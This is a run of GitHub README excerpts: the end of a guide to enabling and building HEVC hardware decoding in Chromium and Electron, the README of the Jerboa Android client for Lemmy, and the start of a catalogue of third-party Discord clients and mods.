4. Open `Windows Task Manager` on Windows and switch to `Performance` - `GPU`. If `Video Decode` (Intel, NVIDIA) or `Video Codec` (AMD) usage is larger than 0 when playing a video, hardware decoding is being used. For some first-generation HEVC-capable GPUs (e.g. NVIDIA GTX 745) there is no dedicated HW decoding circuit inside the GPU; although the `D3D11` decoding API is supported, decoding will only occupy the general `3D` utilization.

## Why does my GPU support HEVC, but hardware decoding still doesn't work?

#### OS version is too low

##### Windows

Make sure you are using Windows 8 or above; `D3D11VideoDecoder` doesn't support Windows 7.

##### macOS

Make sure you are using macOS Big Sur or above; the `CMVideoFormatDescriptionCreateFromHEVCParameterSets` API has compatibility issues on lower macOS versions.

#### GPU driver has bugs

Some GPU drivers have bugs that cause `D3D11VideoDecoder` to be disabled. In this case, upgrade your GPU driver and try again. [See reference](https://source.chromium.org/chromium/chromium/src/+/main:gpu/config/gpu_driver_bug_list.json?q=disable_d3d11_video_decoder)

#### GPU hardware has bugs

Some GPU hardware has bugs that cause `D3D11VideoDecoder` to be disabled. In this case, we can't do anything except use FFmpeg software decoding. [See reference](https://source.chromium.org/chromium/chromium/src/+/main:gpu/config/gpu_driver_bug_list.json?q=disable_d3d11_video_decoder)
## How to Build?

1. Follow [the official build doc](https://www.chromium.org/developers/how-tos/get-the-code/) to prepare the build environment, then fetch the source code from the `main` branch (the HEVC HW code has been merged).
2. (Optional) To enable HEVC software decoding: switch to the `src/third_party/ffmpeg` dir and execute `git am /path/to/add-hevc-ffmpeg-decoder-parser.patch`. If the patch fails to apply, you can also try `node /path/to/add-hevc-ffmpeg-decoder-parser.js` to enable software decoding (Node.js is required to run the script). Then switch to the `src` dir and execute `git am /path/to/enable-hevc-ffmpeg-decoding.patch`.
3. (Optional) To enable HEVC encoding support by default on Windows / macOS / Android: switch to the `src` dir and execute `git am /path/to/enable-hevc-encoding-by-default.patch`.
4. (Optional) To integrate the Widevine CDM to support the EME API (like Netflix): switch to the `src` dir and execute `cp -R /path/to/widevine/* third_party/widevine/cdm` (Windows: `xcopy /path/to/widevine third_party\widevine\cdm /E/H`).
5. If you are using a `Mac`, want to build the `x64` arch (`x86`, `arm64`, `arm` are also available for target_cpu) and want to add CDM support, run `gn gen out/Release64 --args="is_component_build = false is_official_build = true is_debug = false ffmpeg_branding = \"Chrome\" target_cpu = \"x64\" proprietary_codecs = true media_use_ffmpeg = true enable_widevine = true bundle_widevine_cdm = true"`. If you are using `Windows`, you need to add `enable_media_foundation_widevine_cdm = true` as well.
6. Run `autoninja -C out/Release64 chrome` to start the build.
7. Open Chromium directly.
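Collected in one place, the optional patch steps plus the build commands from steps 2-6 above might look like the following on macOS; every `/path/to/...` is a placeholder from the original instructions, not a real path:

```shell
# Sketch of steps 2-6 (macOS, x64, with CDM); /path/to/... are placeholders.
cd src/third_party/ffmpeg
git am /path/to/add-hevc-ffmpeg-decoder-parser.patch    # optional: HEVC SW decoding
cd ../..
git am /path/to/enable-hevc-ffmpeg-decoding.patch       # optional: HEVC SW decoding
git am /path/to/enable-hevc-encoding-by-default.patch   # optional: encoding on by default
cp -R /path/to/widevine/* third_party/widevine/cdm      # optional: Widevine CDM
gn gen out/Release64 --args="is_component_build = false is_official_build = true is_debug = false ffmpeg_branding = \"Chrome\" target_cpu = \"x64\" proprietary_codecs = true media_use_ffmpeg = true enable_widevine = true bundle_widevine_cdm = true"
autoninja -C out/Release64 chrome
```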
## How to integrate this into a Chromium-based project like Electron?

If Electron >= v22.0.0, the HEVC HW decoding feature for macOS, Windows, and Linux (VAAPI only) has already been integrated. To add HEVC SW decoding, the method is the same as in the Chromium guide above.

## Change Log

`2024-05-30` Fixed abnormal color when HEVC video is encoded with the GBR color-space matrix (Chrome >= `127.0.6510.0`)

`2024-04-18` Fixed video frame stuttering on some AMD GPUs (Edge >= `124.0.2478.49`), and bad HEVC Main10 HDR tone-mapping performance for Edge on the Windows platform (Edge >= `125.0.2530.0`)

`2024-04-09` Fixed HEVC Rext 4:2:2/4:4:4 video chroma sampling being downgraded to 4:2:0 on the Windows/macOS platforms (Chrome >= `125.0.6408.0`)

`2024-03-28` Updated Chromium 123 / 124 HDR-related bug-fix details, and the tech diff with Chrome for Edge >= 122

`2023-12-22` Updated implementation details and the comparison with Firefox

`2023-12-08` Improved Dolby Vision playback capabilities (Chrome >= `122.0.6168.0`)

`2023-11-16` Support MV-HEVC base-layer playback (Chrome >= `121.0.6131.0`)

`2023-10-20` Fixed a Windows CRA/RASL image-artifact issue when seeking (Chrome >= `120.0.6076.0`)

`2023-10-10` Blocked Intel driver versions between `20.19.15.4284` and `20.19.15.5172` that could cause HEVC playback crashes (Chrome >= `120.0.6059.0`)

`2023-10-02` Updated HDR10/PQ support status for Edge 117

`2023-09-23` Fixed 10 bit video playback issues for AMD GPUs on the Windows platform (black screen when playing HLG video in SDR mode, 4K freezes, high memory usage, color changes when switching full-screen, crash when playing SDR video in HDR mode; Chrome >= `119.0.6022.0`)

`2023-08-21` Added HEVC Rext 8 bit 422 support on Windows (Chrome >= `118.0.5956.0`)

`2023-07-28` Fixed a latency issue with the WebCodecs VideoDecoder implementation for H265 on Windows (detail: https://github.com/w3c/webcodecs/issues/698, Chrome >= `117.0.5913.0`)

`2023-07-20` Added HEVC HW WebCodecs encoding support for Android 10+ (Chrome >= `117.0.5899.0`)

`2023-07-16` Apple Silicon + macOS 14 adds HEVC SVC (L1T2) WebCodecs encoding support (Chrome >= `117.0.5891.0`)

`2023-07-07` Fixed an 8 bit HDR HEVC playback failure on Windows (Chrome >= `117.0.5877.0`)

`2023-07-02` Added HEVC Rext 8 bit 444, 12 bit 422, 12 bit 444 support on Windows (Chrome >= `117.0.5866.0`)

`2023-02-22` The Android platform can now use the support detection APIs to detect the correct support status of different devices (Chrome >= `112.0.5612.0`)

`2023-02-17` Updated the Widevine L1 HEVC / Dolby Vision support detection method

`2023-02-14` The Android platform now allows H264 / HEVC / VP9 / AV1 to be played at the maximum resolution supported by the device. Previously all codecs were hard-capped at 4K; now, as long as the device supports it, 8K or even higher resolutions work (Chrome >= `112.0.5594.0`)

`2023-02-11` Allow videos with an invalid colorspace (primary, matrix, transfer) to play instead of blocking the whole playback (Chrome >= `112.0.5589.0`)

`2022-12-03` Fixed the incomplete SEI parsing logic, and supported extracting HDR metadata from both the bitstream and the container.
This solves the problem that static HDR metadata could not be extracted from some HDR10 videos, and guarantees the best HDR performance (Chrome >= `110.0.5456.0`)

`2022-11-18` Fixed a bug where, if D3D11VideoDecoder was disabled by a GPU workaround, the support detection APIs still reported "supported" (M110, M109)

`2022-11-03` Added macOS WebCodecs HEVC encode support, decreased GPU memory usage by 50% when playing HDR content on an SDR screen on Windows, and improved HDR tone-mapping color accuracy on Windows as well

`2022-10-28` Edge (Mac) >= 107 enabled by default

`2022-10-25` Chrome >= 107 enabled by default + Windows WebCodecs encode support

`2022-10-11` Added Linux HEVC HW decoding support (Chrome >= `108.0.5354.0`)

`2022-10-09` HEVC with alpha (macOS only) supports decoding with the WebCodecs API and preserves its alpha layer

`2022-10-08` Added HDR10 metadata extraction logic; WebCodecs supports >= 10 bit

`2022-09-26` Added an auto-generation script for the SW decoding patch

`2022-09-15` Fixed a crash on Intel 11th/12th Gen iGPUs when playing HDR video in system HDR mode, improved the accuracy of the MediaCapabilities API, and updated the patch to `107.0.5303.0`

`2022-09-14` Chrome Canary >= `107.0.5300.0` has the HEVC HW decoder enabled by default; the official version became available after `2022-10-25`

`2022-09-08` Guaranteed the detection APIs' results (Chrome >= `107.0.5288.0`), and updated the detection methods

`2022-08-31` Added WebCodecs API (8 bit only) support, and HEVC with alpha layer support (macOS only)

`2022-08-06` Updated usage for the Edge (Mac) 104 release version

`2022-08-02` Updated usage for the Chrome 104 release version

`2022-08-01` Added Chrome / Edge usage

`2022-07-31` Intel GPUs support HEVC Rext profile HW decoding on Windows; updated the patch to `106.0.5211.0`

`2022-07-15` Updated the Electron v20.0.0-beta.9 and above support status

`2022-06-21` Updated the Microsoft Edge (Mac) feature test guide

`2022-06-18` Fixed HLG/PQ tone mapping, and updated the patch to `105.0.5127.0`

`2022-06-17` Removed Linux support; updated other platform and HDR support status

`2022-05-26` Updated the Chrome Canary HEVC feature test guide

`2022-05-25` Updated the Chrome 104 support status, and the Electron 20 enable method

`2022-05-24` Updated the patch to `104.0.5080.1`

`2022-05-23` Added a CDM compile guide, and updated the patch to `104.0.5077.1`

`2022-05-17` Updated details of the tech implementation and the guide to integrate into Electron

`2022-05-14` Updated the patch to `104.0.5061.1`

`2022-05-13` Added an HEVC test page

`2022-05-10` Updated the README; added more detail on hardware support and GPU models

`2022-05-05` Added support for MSP & Rext on macOS, and fixed some HDR & Rec.709 Main10 videos not being HW-decoded on Windows

`2022-04-27` Switched to `git am` patches

`2022-04-24` Added a Chinese README

`2022-04-21` Added Crbug traces

`2022-04-20` Modified the README

`2022-04-19` Initial commit

## Trace Crbug

##### [Windows](https://crbug.com/1286132)

##### [macOS](https://crbug.com/1300444)

## License

MIT
A guide that teaches you how to enable hardware HEVC decoding & encoding for Chrome / Edge, or how to build a custom version of Chromium / Electron that supports hardware & software HEVC decoding and hardware HEVC encoding.
chrome,hevc,hardware-decode,electron
13
2
1
103
7
1
0
LemmyNet/jerboa
<div align="center"> ![GitHub tag (latest SemVer)](https://img.shields.io/github/tag/LemmyNet/jerboa.svg) [![status-badge](https://woodpecker.join-lemmy.org/api/badges/LemmyNet/jerboa/status.svg)](https://woodpecker.join-lemmy.org/LemmyNet/jerboa) [![GitHub issues](https://img.shields.io/github/issues-raw/LemmyNet/jerboa.svg)](https://github.com/LemmyNet/jerboa/issues) [![License](https://img.shields.io/github/license/LemmyNet/jerboa.svg)](LICENSE) ![GitHub stars](https://img.shields.io/github/stars/LemmyNet/jerboa?style=social) </div> <p align="center"> <a href="https://github.com/LemmyNet/jerboa" rel="noopener"> <img width=200px height=200px src="https://raw.githubusercontent.com/LemmyNet/jerboa/main/app/src/main/res/jerboa.svg"></a> <h3 align="center"><a href="https://github.com/LemmyNet/jerboa">Jerboa</a></h3> <p align="center"> An Android client for <a href="https://github.com/LemmyNet/lemmy">Lemmy</a>, a federated reddit alternative <br /> <br /> <a href="https://join-lemmy.org">Join Lemmy</a> ยท <a href="https://github.com/LemmyNet/jerboa/issues">Report Bug</a> ยท <a href="https://github.com/LemmyNet/jerboa/issues">Request Feature</a> ยท <a href="https://github.com/LemmyNet/jerboa/blob/main/RELEASES.md">Releases</a> </p> <p align="center"> <a href="https://apt.izzysoft.de/fdroid/index/apk/com.jerboa"><img src="https://gitlab.com/IzzyOnDroid/repo/-/raw/master/assets/IzzyOnDroid.png" alt="Get it on IzzyOnDroid" height="80"></a> <a href="https://f-droid.org/packages/com.jerboa"><img src="https://fdroid.gitlab.io/artwork/badge/get-it-on.png" alt="Get it on F-Droid" height="80"></a> <a href="https://play.google.com/store/apps/details?id=com.jerboa"><img src="https://cdn.rawgit.com/steverichey/google-play-badge-svg/master/img/en_get.svg" height="80"></a> <a href="https://github.com/LemmyNet/jerboa/releases/latest"><img src="https://raw.githubusercontent.com/andOTP/andOTP/master/assets/badges/get-it-on-github.png" height="80"></a> </p> </p> ## About Jerboa | Homepage | Post & Comments | | -------------------------------------------------------------------------- | ------------------------------------------------------------------------ | | ![img_1](./fastlane/metadata/android/en-US/images/phoneScreenshots/01.png) | ![img_2](fastlane/metadata/android/en-US/images/phoneScreenshots/02.png) | Jerboa is a native-android client for Lemmy, built using the native Android Toolkit, Jetpack Compose. **Warning**: You can submit issues, but between Lemmy and lemmy-ui, I probably won't have too much time to work on them. Learn jetpack compose like I did if you want to help make this app better. ### Built With - [Android Jetpack Compose](https://developer.android.com/jetpack/compose) - [Kotlin](https://kotlinlang.org/) - [Retrofit](https://square.github.io/retrofit/) ## Features - Open source, [AGPL License](/LICENSE). ## Installation / Releases - [Releases](https://github.com/LemmyNet/jerboa/releases) - [IzzyOnDroid](https://apt.izzysoft.de/fdroid/index/apk/com.jerboa) - [F-Droid](https://f-droid.org/en/packages/com.jerboa/) - [Google Play](https://play.google.com/store/apps/details?id=com.jerboa) ## Support / Donate Jerboa is made by Lemmy's developers, and is free, open-source software, meaning no advertising, monetizing, or venture capital, ever. Your donations directly support full-time development of the project. Jerboa and Lemmy are made possible by a generous grant from the [NLnet foundation](https://nlnet.nl/). - [Support on Liberapay](https://liberapay.com/Lemmy). 
- [Support on OpenCollective](https://opencollective.com/lemmy).
- [Support on Patreon](https://www.patreon.com/dessalines).
- [List of Sponsors](https://join-lemmy.org/donate).

### Crypto

- bitcoin: `1Hefs7miXS5ff5Ck5xvmjKjXf5242KzRtK`
- ethereum: `0x400c96c96acbC6E7B3B43B1dc1BB446540a88A01`
- monero: `41taVyY6e1xApqKyMVDRVxJ76sPkfZhALLTjRvVKpaAh2pBd4wv9RgYj1tSPrx8wc6iE1uWUfjtQdTmTy2FGMeChGVKPQuV`

## Contact

- [Mastodon](https://mastodon.social/@LemmyDev)
- [Jerboa dev chat](https://matrix.to/#/#jerboa-dev:matrix.org)
- [Lemmy chat](https://matrix.to/#/#lemmy:matrix.org)

## Credits

Icons made by [Freepik](https://www.freepik.com) from [www.flaticon.com](https://www.flaticon.com).
A native Android app for Lemmy
activitypub,android,android-application,lemmy,link-aggregator,mobile-app
63
97
722
916
104
224
0
Discord-Client-Encyclopedia-Management/Discord3rdparties
# Discord Client Encyclopedia

<p align="center">
  <a href="https://discord.gg/3kv5yzTYQE">
    <img alt="Discord" src="https://img.shields.io/discord/1044501553731600414?color=%7767d2&label=Support%20Server&logo=discord&logoColor=%cd67d2&style=for-the-badge">
  </a>
</p>
<p align="center">
  <img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/Discord-Client-Encyclopedia-Management/Discord3rdparties?color=ec9c36&logo=github&style=for-the-badge">
  <img alt="GitHub forks" src="https://img.shields.io/github/forks/Discord-Client-Encyclopedia-Management/Discord3rdparties?color=ec365a&logo=github&style=for-the-badge">
  <a href="https://github.com/Discord-Client-Encyclopedia-Management/Discord3rdparties/blob/main/LICENSE">
    <img alt="License" src="https://img.shields.io/github/license/Discord-Client-Encyclopedia-Management/Discord3rdparties?style=for-the-badge">
  </a>
</p>

A non-exhaustive collection of third-party clients and mods for Discord.

## Table of Contents

- [Discord Client Encyclopedia](#discord-client-encyclopedia)
  - [Table of Contents](#table-of-contents)
  - [Mobile](#mobile)
    - [Android Clients \& Mods](#android-clients--mods)
    - [iOS Clients \& Mods](#ios-clients--mods)
  - [Desktop](#desktop)
    - [Official Clients](#official-clients)
    - [Mods](#mods)
    - [Plugin bundlers](#plugin-bundlers)
    - [Third-Party Reimplementations](#third-party-reimplementations)
    - [Console clients](#console-clients)
    - [Other clients](#other-clients)
  - [Third party server implementations](#third-party-server-implementations)
  - [Contributing](#contributing)
  - [Further comments](#further-comments)
  - [Disclaimer](#disclaimer)

## Mobile

### Android Clients & Mods

| Name | Features | Language(s) | Development Status |
| :---: | :---: | :---: | :---: |
| [Discord Android](https://play.google.com/store/apps/details?id=com.discord&fingerprint=1129189278619021403._iqMp85lJ8wwcey3i6XvuHeKLYA&attemptId=a267ef68-ca9f-435f-99a6-f6a11875cf6c) | Official Android client | [Closed source] | ๐ŸŸข Active |
| [Aliucord](https://github.com/Aliucord/Aliucord) | A modification for the Android Discord app | [![Java][Java-Badge]][Java-Url] [![Kotlin][Kotlin-Badge]][Kotlin-Url] [![Dart][Dart-Badge]][Dart-Url] | ๐Ÿ”ต Active *(Out of date[^1]\)* |
| [Bunny](https://github.com/pyoncord/Bunny) | A mod for Discord's mobile apps, fork of Vendetta. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active |
| [VendroidEnhanced](https://github.com/VendroidEnhanced/Vendroid) | VendroidEnhanced is a fork of [Vencord/Vendroid](https://github.com/Vencord/Android) that improves upon the original project. | [![Kotlin][Kotlin-Badge]][Kotlin-Url] [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active |
| [Vendroid](https://github.com/Vencord/Vendroid) | Vencord for Android! A WebView embedding the Discord site, loading Vencord and adding some goodies. | [![Java][Java-Badge]][Java-Url] [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active |
| [Revenge](https://github.com/revenge-mod/Revenge) | A modification for Discord mobile apps. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued |
| [Vendetta](https://github.com/vendetta-mod/Vendetta) | A Discord mod that is compatible with Android and iOS! | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued |
| [CutTheCord](https://gitdab.com/distok/cutthecord) | Modular client mod for Discord's Android app. | [![Python][Python-Badge]][Python-Url] [![Java][Java-Badge]][Java-Url] | ๐Ÿ”ด Discontinued |
| [![Python][Python-Badge]][Python-Url] [![Java][Java-Badge]][Java-Url] | ๐Ÿ”ด Discontinued | | [OpenCord](https://github.com/X1nto/OpenCord) | An open-source implementation of the Discord Android app | [![Kotlin][Kotlin-Badge]][Kotlin-Url] | ๐Ÿ”ด Discontinued | | [OpenCord ACTIVE EDITION](https://github.com/topminipie/OpenCord) | An open-source implementation of the Discord Android app | [![Kotlin][Kotlin-Badge]][Kotlin-Url] | ๐ŸŸข Active | | [Treecord](https://github.com/Treecord/Treecord) | A modded Discord client for Android! | [![Shell Script][Shell Script-Badge]][Shell Script-Url] | ๐Ÿ”ด Discontinued | | Bluecord | Modded client mod for Android | [Closed source] | โ›” Malware (scams and spying) | ### iOS Clients & Mods | Name | Features | Language(s) | Development Status | | :---: | :---: | :---: | :---: | | [Discord iOS](https://apps.apple.com/us/app/discord-chat-talk-hangout/id985746746) | Official iOS client | [Closed source] | ๐ŸŸข Active | | [Enmity](https://enmity.unbound.rip/) | The power of addons, all in your hand. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Bunny](https://github.com/pyoncord/Bunny) | A mod for Discord's mobile apps, fork of Vendetta. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Revenge](https://github.com/revenge-mod/Revenge) | A modification for Discord mobile apps. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [Vendetta](https://github.com/vendetta-mod/Vendetta) | A Discord mod that is compatible with Android and iOS! | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [Discord Classic](https://github.com/cellomonster/iOS-Discord-Classic) | A bare-bones Discord client for iOS 5 and 6. | [![Objective-C][Objective-C-Badge]][Objective-C-Url] | ๐Ÿ”ด Discontinued | ## Desktop ### Official Clients | Name | Link | Infos | | :---: | :---: | :---: | | [Discord](https://discord.com) | [Web](https://discord.com/app), [Windows](https://discord.com/api/download/stable?platform=win), [macOS](https://discord.com/api/download/stable?platform=osx), [Debian/Ubuntu](https://discord.com/api/download/stable?platform=linux), [Tarball](https://discord.com/api/download/stable?platform=linux&format=tar.gz) | Main software | | [Discord PTB](https://ptb.discord.com) | [Web](https://ptb.discord.com/app), [Windows](https://discord.com/api/download/ptb?platform=win), [macOS](https://discord.com/api/download/ptb?platform=osx), [Debian/Ubuntu](https://discord.com/api/download/ptb?platform=linux), [Tarball](https://discord.com/api/download/ptb?platform=linux&format=tar.gz) | Public Test Build | | [Discord Canary](https://canary.discord.com) | [Web](https://canary.discord.com/app), [Windows](https://discord.com/api/download/canary?platform=win), [macOS](https://discord.com/api/download/canary?platform=osx), [Debian/Ubuntu](https://discord.com/api/download/canary?platform=linux), [Tarball](https://discord.com/api/download/canary?platform=linux&format=tar.gz) | Discord's [canary build](https://semaphoreci.com/blog/what-is-canary-deployment), releases features earlier than PTB | | Discord Development | [Windows](https://discord.com/api/download/development?platform=win), [macOS](https://discord.com/api/download/development?platform=osx), [Debian/Ubuntu](https://discord.com/api/download/development?platform=linux), [Tarball](https://discord.com/api/download/development?platform=linux&format=tar.gz) | Essentially Discord's canary build but with updates a few days earlier | ### Mods | Name 
| Features | Language(s) | Development Status | | :---: | :---: | :---: | :---: | | [Aero](https://github.com/aero-mod/aero) | A next-generation Discord mod empowering users and developers alike. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [BeautifulDiscord](https://github.com/leovoel/BeautifulDiscord) | Simple Python script that adds CSS hot-reload to Discord. | [![Python][Python-Badge]][Python-Url] | ๐ŸŸข Active | | [BetterDiscord](https://betterdiscord.app/) | BetterDiscord extends the functionality of DiscordApp by enhancing it with new features. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [DiscoCSS](https://github.com/mlvzk/discocss) | A tiny Discord CSS injector for Linux and Mac OS. | [![Shell Script][Shell Script-Badge]][Shell Script-Url] | ๐ŸŸข Active | | [Kernel](https://github.com/kernel-mod) | A super small and fast Electron client mod with the most capability. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [OpenAsar](https://openasar.dev/) | Alternative `app.asar` for Discord. Makes your client feel snappier. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] [![Nim][Nim-Badge]][Nim-Url] | ๐ŸŸข Active | | [Replugged](https://replugged.dev) | A lightweight Discord client mod focused on simplicity and performance. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [shelter](https://github.com/uwu/shelter) | shelter is a new-generation client mod built to be essentially bulletproof (i.e. to survive changes such as Discord's switch to SWC). | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Vencord](https://github.com/Vendicated/Vencord) | Proper context isolation, inline patches, Custom CSS, Usefulโ„ข plugins | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Vesktop](https://github.com/Vencord/Vesktop) | Vesktop is a cross-platform desktop app aiming to give you a snappier Discord experience with Vencord pre-installed | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Cumcord](https://github.com/Cumcord/Cumcord) | Cumcord is a Discord client mod that focuses on making the Discord plugin development experience easier. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Vizality](https://vizality.com/) | A Discord client modification, allowing for a truly customizable experience through the use of plugins, themes, and built-in settings. *Runs on web browsers too* | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | | [Hykord](https://github.com/xHyroM/hykord) | xHyroM's @discord client modification. Supports BD themes and is working on BD and PC/RP plugin support. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] [![Zig][Zig-Badge]][Zig-Url] [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | | [Crycord](https://crycord.geopjr.dev/) | A Discord Client modification with plugins. Uses BeautifulDiscord's CSS injector. Oh, it's also written in Crystal! | [![Crystal][Crystal-Badge]][Crystal-Url] | ๐ŸŸ  On hiatus, since May 2021 | | [Demoncord](https://git.ruthenic.com/Demon/demoncord-rewrite) | A Discord client mod by satanists, for satanists. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸ  On hiatus, since September 2022 | | [EnhancedDiscord](https://github.com/joe27g/EnhancedDiscord) | A lightweight Discord client mod. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Abandoned | | Acord Premium | A client you have to pay for that stole its code.
| [Closed source] | โ›” sus behavior (Stolen code) | | [GooseMod](https://goosemod.com/) | GooseMod is a new, store-driven Discord mod. *Runs on web browsers too* | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | | [HolyMod](https://github.com/HolyMod/HolyMod) | A lightweight client mod focused on simplicity and performance. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [Lightcord](https://github.com/Lightcord/Lightcord) | Lightcord is a simple and customizable client for Discord. It includes BandagedBD, Glasstron and a discord.js-like api. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued, and abandoned | | [Powercord](https://powercord.dev/) | A lightweight Discord client mod focused on simplicity and performance. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [Topaz](https://topaz.goosemod.com/) | Topaz is an upcoming mod which aims to be "next-gen" by using advanced tech to add never-before-seen innovative features. *Runs on web browsers too* | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | | [Velocity](https://github.com/Velocity-Discord/Velocity) | Velocity is a Discord Client modification that allows you to extend discord's functionality and capabilities. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | #### Plugin bundlers | Name | Features | Language(s) | Development Status | | :---: | :---: | :---: | :---: | | [Ittai (AAGaming's fork)](https://git.catvibers.me/Ittai/ittai) | Fork of Ittai that can bundle plugins to BetterDiscord, Powercord and Goosemod, making a plugin cross-platform. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [Ittai (Original)](https://github.com/Kyza/ittai) | Bundler for BetterDiscord, Powercord and Goosemod, making a plugin cross-platform. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | | [BetterDiscordBuilder](https://github.com/BetterDiscordBuilder/bdbuilder) | Simplified plugin bundler for BetterDiscord. Supports JSX/TSX and TypeScript | [![JavaScript][JavaScript-Badge]][JavaScript-Url] [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | ### Third-Party Reimplementations | Name | Features | Language(s) | Development Status | | :---: | :---: | :---: | :---: | | [Abaddon](https://github.com/uowuo/abaddon) | Alternative Discord client made in C++ with GTK | [![C++][C++-Badge]][C++-Url] | ๐ŸŸข Active | | [LibreDiscord](https://gitlab.com/zipdox/librediscord/-/tree/master?ref_type=heads) | LibreDiscord is a free and open source voice and video client for Discord written in C using GTK3 and GLib. | [![C++][C++-Badge]][C++-Url] | ๐ŸŸ  On hiatus | | [Discord Messenger-DM](https://github.com/DiscordMessenger/dm) |Discord Messenger is a free Discord-compatible messaging client targeting both new and old Windows. | [![C++][C++-Badge]][C++-Url] | ๐ŸŸข Active | | [AeroChat](https://aerochat.live/) | A Discord client themed to look like WLM 09. | [![React][React-Badge]][React-Url] [![TypeScript][TypeScript-Badge]][TypeScript-Url]| ๐ŸŸข Active | | [Armcord](https://github.com/armcord/armcord) | ArmCord is a custom client designed to enhance your Discord experience while keeping everything lightweight. 
| [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [ChimeraCord](https://github.com/RoboChimera/ChimeraCord) | A functional but elegant unofficial Discord client for freeBSD, that aims for feature-parity with the official Discord client. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Datcord](https://github.com/gamingdoom/datcord) | An open-source discord client using firefox. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Discord-PWA](https://github.com/NeverDecaf/discord-PWA) | A wrapper for the Discord web client as a Progressive Web Application, for use with Chromium based browsers. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Discord-Sandbox](https://github.com/khlam/discord-sandboxed) | Open-source Sandbox Discord client for the privacy-minded. Say NO to intrusive data collection. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [discord-screenaudio](https://github.com/maltejur/discord-screenaudio) | A custom Discord client that supports streaming with audio on Linux. | [![C++][C++-Badge]][C++-Url] [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Discordo](https://github.com/ayntgl/discordo) | A lightweight, secure, and feature-rich Discord terminal client | [![Go][Go-Badge]][Go-Url] | ๐ŸŸข Active | | [Dorion](https://github.com/SpikeHD/Dorion) | Lightweight alternative Discord client with a smaller footprint and some fancy extensible features | [![Rust][Rust-Badge]][Rust-Url] [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [FeatherCord](https://github.com/OfficiallySp/FeatherCord) | FeatherCord is a lightweight alternative to the Discord client and uses up to 25% less resources compared to the default desktop client. | [Closed source] | ๐Ÿ”ด Discontinued | | [GoofCord](https://github.com/Milkshiift/GoofCord) | A privacy-focused client with features like message encryption, script loading, and more. Based on ArmCord. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Dissent](https://github.com/diamondburned/dissent) | Dissent (previously gtkcord4) is a third-party Discord client designed for a smooth, native experience on Linux desktops. | [![Go][Go-Badge]][Go-Url] | ๐ŸŸข Active | | [LemonCord](https://github.com/japandotorg/LemonCord) | A fast & light weight Discord Client made with love using the Rust programming language. | [![Rust][Rust-Badge]][Rust-Url] | ๐ŸŸข Active | | [QTCord](https://github.com/mak448a/QTCord/) | A lightweight Discord client written in Python and QT aiming for a native look and feel. | [![Python][Python-Badge]][Python-Url] | ๐ŸŸข Active | | [RyU](https://github.com/Muunatic/RyU) | Powerful Discord Client written in JavaScript. Lightweight, Efficient, Feature-rich. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Swiftcord](https://github.com/cryptoAlgorithm/Swiftcord) | A completely native Discord client for macOS built 100% in Swift and SwiftUI! 
